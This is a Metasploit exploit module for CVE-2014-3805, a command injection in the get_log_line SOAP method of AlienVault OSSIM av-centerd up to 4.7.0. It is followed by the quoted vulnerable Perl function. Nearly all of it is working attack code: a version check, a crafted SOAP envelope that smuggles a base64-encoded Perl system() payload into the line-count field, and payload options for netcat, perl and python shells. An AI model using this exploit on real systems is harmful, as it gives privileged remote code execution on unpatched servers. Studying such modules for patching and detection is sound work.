Alienvault OSSIM av-centerd 4.7.0 get_log_line Command Injection

`require 'msf/core'  
require 'rexml/document'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include REXML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line',  
'Description' => %q{  
This module exploits a command injection flaw found in the get_log_line  
function found within Util.pm. The vulnerability is triggered due to an  
unsanitized $r_file parameter passed to a string which is then executed  
by the system  
},  
'Author' => [ 'james fitts' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2014-3805' ],  
[ 'OSVDB', '107992' ]  
],  
'Privileged' => true,  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'DefaultOptions' =>  
{  
'SSL' => true,  
},  
'Payload' =>  
{  
'Compat' => {  
'RequiredCmd' => 'perl netcat-e openssl python gawk'  
}  
},  
'DefaultTarget' => 0,  
'Targets' =>  
[  
['Alienvault <= 4.7.0',{}]  
],  
'DisclosureDate' => 'Jul 18 2014'))  
  
register_options([Opt::RPORT(40007)], self.class)  
end  
  
def check  
version = ""  
res = send_soap_request("get_dpkg")  
  
if res &&  
res.code == 200 &&  
res.headers['SOAPServer'] &&  
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&  
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/  
  
version = $1  
end  
  
if version.empty? || version >= "4.7.0"  
return Exploit::CheckCode::Safe  
else  
return Exploit::CheckCode::Appears  
end  
end  
  
def build_soap_request(method)  
xml = Document.new  
xml.add_element(  
"soap:Envelope",  
{  
"xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",  
"xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",  
"xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",  
"soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",  
"xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"  
})  
  
body = xml.root.add_element("soap:Body")  
m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })  
  
args = []  
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})  
args[0].text = "All"  
  
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})  
args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"  
  
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})  
args[2].text = "#{datastore['RHOST']}"  
  
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})  
args[3].text = "#{rand_text_alpha(4 + rand(4))}"  
  
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})  
args[4].text = "/var/log/auth.log"  
  
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})  
perl_payload = "system(decode_base64"  
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"  
args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"  
  
xml.to_s  
end  
  
def send_soap_request(method, timeout=20)  
soap = build_soap_request(method)  
  
res = send_request_cgi({  
'uri' => '/av-centerd',  
'method' => 'POST',  
'ctype' => 'text/xml; charset=UTF-8',  
'data' => soap,  
'headers' => {  
'SOAPAction' => "\"AV/CC/Util##{method}\""  
}  
}, timeout)  
  
res  
end  
  
def exploit  
send_soap_request("get_log_line", 1)  
end  
end  
__END__  
  
/usr/share/alienvault-center/lib/AV/CC/Util.pm  
  
sub get_log_line {  
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )  
= @_;  
  
verbose_log_file(  
"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"  
);  
  
my @ret = ("$systemuuid");  
  
if ( $r_file =~ /\.\./ ){  
push(@ret,"File not auth");  
return \@ret;  
}  
  
if ( $number_lines <= 0) {  
push(@ret,"Error in number lines");  
return \@ret;  
}  
  
if (( $r_file =~ /^\/var\/log\// ) or ( $r_file =~ /^\/var\/ossec\/alerts\// ) or ( $r_file =~ /^\/var\/ossec\/logs\// )){  
if (! -f "$r_file" ){  
push(@ret,"File not found");  
return \@ret;  
}  
push(@ret,"ready");  
  
my $command = "tail -$number_lines $r_file";  
#push(@ret,"$command");  
#my @content = `tail -$number_lines $r_file`;  
my @content = `$command`;  
push(@ret,@content);  
return \@ret;  
}  
else {  
push(@ret,"path not auth");  
return \@ret;  
}  
}  
  
  
  
`